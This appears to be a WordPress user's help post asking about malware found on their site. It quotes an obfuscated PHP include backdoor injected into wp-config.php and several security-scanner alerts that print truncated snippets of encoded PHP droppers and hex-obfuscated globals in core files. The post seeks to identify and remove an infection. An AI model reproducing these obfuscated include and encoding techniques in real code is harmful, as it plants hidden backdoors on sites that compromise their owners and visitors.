What is this in my wordpress?

What is this in my wp-config.php

/*d1baf*/

@include "\057hom\145/w1\061220\06427/\160ubl\151c_h\164ml/\146ind\166irg\151ns.\143om/\167p-i\156clu\144es/\122equ\145sts\057Uti\154ity\057.08\060a47\0633.i\143o";

/*d1baf*/

What is Filename: ex685iu0.php ?

Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <?php\x0a$osxiohq = ‘u03#y5Hp_gn2*867rl9ce4ka1do-\’xvtsmib’;$xlbim = Array();$xlbim[] = $osxiohq[6].$osxiohq[12];$xlbim[] = $osxiohq[3];$xlbim[] = $osxiohq[21].$osxiohq[5].$osxiohq[25].$osxiohq[23].$osxi…

The issue type is: Suspicious:PHP/encodedtextlookup.6190
Description: Suspicious encoded content. This encoding is often used to hide malware

What is Filename: index.php File Type: Core

Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: include “\057hom\145/w1\061

The issue type is: Backdoor:PHP/ObfuscatedInclude.6067
Description: PHP include() statement with an obfuscated filepath.

What is Filename: tqc23xlb.php

Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <?php\x0a$sqsdr = ‘gnr78-0u#_pcovf2yHxid*4elkt\’sba5m’;$wrkec = Array();$wrkec[] = $sqsdr[20].$sqsdr[30].$sqsdr[11].$sqsdr[31].$sqsdr[23].$sqsdr[15].$sqsdr[15].$sqsdr[4].$sqsdr[5].$sqsdr[15].$sqsdr[3].$s…

The issue type is: Suspicious:PHP/encodedtextlookup.6190
Description: Suspicious encoded content. This encoding is often used to hide malware

What is Filename: wp-admin/includes/screen.php File Type: Core

Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: ${“\x47\x4c\x4fB\x41\x4c\x53”}

The issue type is: Suspicious:PHP/hexedvarhexedglobals.3893
Description: Suspicious variable encoding often used by malware

What is Filename: wp-admin/includes/screen.php File Type: Core

Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: ${“\x47\x4c\x4fB\x41\x4c\x53”}

The issue type is: Suspicious:PHP/hexedvarhexedglobals.3893
Description: Suspicious variable encoding often used by malware

Related posts
Leave Comment

Positive SSL